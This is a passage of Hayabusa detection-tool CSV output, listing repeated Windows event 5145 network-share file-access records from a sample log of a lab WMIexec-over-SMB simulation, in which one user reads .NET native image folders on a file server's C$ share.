2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv30e99c02#\c97638c574cae07911907fa19e2aeedd | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.803 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.819 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv43e0ae6e#\e9302436a2c607db888bcb3b14ebba8e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.834 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv759bfb78#\5e015d37aa3fdc75648e9d00d44d13ac | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.850 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.866 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14259fd9#\3c06d012b88601107a4449fb04067a20 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.882 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servae423458#\67f143e1f5d81dae33879b84e0035cad | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servb00a6512#\03d76bf2a39a57e8bed74e782c62fd1c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\ee53227bcc4430088d0b560752c1cd02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.906 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Servf73e6522#\39bc23d9592ef276c70a36ef0311070a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\4c3126aec3364546e4ade89c24c4e742 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Speech\6d5f82d8178e3d8e9931e70dce584863 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions\95c749867e5f72a09ed1e59a57931301 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.922 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web\90285827b1300835ca1aaff1dff83a01 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8da3333a#\3dde15282321aa41c609dc7f7a5f1af5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.938 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.8dc504e4#\61d489d8a768782ce394f299dcc0e4bb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:30.969 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.9c7998a9#\f2c2cff3fa34c990079298396b1ec1fc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:31.000 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\4b7763786015950c44dbba0ff26b883e | IP Addr: 10.23.23.9 | LID: 